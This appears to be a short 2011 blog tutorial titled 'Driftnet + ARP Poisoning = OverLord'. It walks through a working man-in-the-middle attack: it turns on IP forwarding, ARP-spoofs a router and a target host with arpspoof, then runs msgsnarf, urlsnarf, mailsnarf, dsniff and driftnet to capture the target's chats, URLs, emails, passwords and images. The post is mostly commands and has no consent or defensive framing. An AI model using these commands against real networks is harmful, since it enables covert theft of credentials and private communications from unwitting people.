2011-08-31

(!) Driftnet + ARP Poisoning = OverLord

These are the command-line tools we will use to spoof our subject into thinking that we are the router, so that it sends all of its network traffic through us.

Tools: dsniff suite and driftnet.
On Ubuntu: apt-get install driftnet dsniff

Before we get our attack started we'll need to enable packet forwarding. This means we'll allow the traffic of our subjects to flow through our machine. We need to switch on ip_forward.

1. To check the current setting type: cat /proc/sys/net/ipv4/ip_forward
If you get a "0", it is currently off.

2. Type the following to turn it on: echo 1 > /proc/sys/net/ipv4/ip_forward
"1" switches it on.

3. Then you can check again: cat /proc/sys/net/ipv4/ip_forward

4. Now we have to set up the traffic flow using arpspoof. The switch "-t" means target.

arpspoof -t 10.10.10.1 10.10.10.99 - watch traffic from x.x.x.1 (router) to x.x.x.99 (host)
We'll also do the reverse to watch traffic going in the opposite direction:
arpspoof -t 10.10.10.99 10.10.10.1

5. Let the fun begin: OverLord!
msgsnarf -i eth0 - will watch chat sessions and messenger clients (Yahoo, Gmail, IRC, etc.)
urlsnarf -i eth0 - will watch URLs requested by the subject
mailsnarf -i eth0 - will watch for emails
dsniff -i eth0 - will watch for passwords
driftnet -i eth0 - will watch for pictures on the net

6. To shut down all: killall arpspoof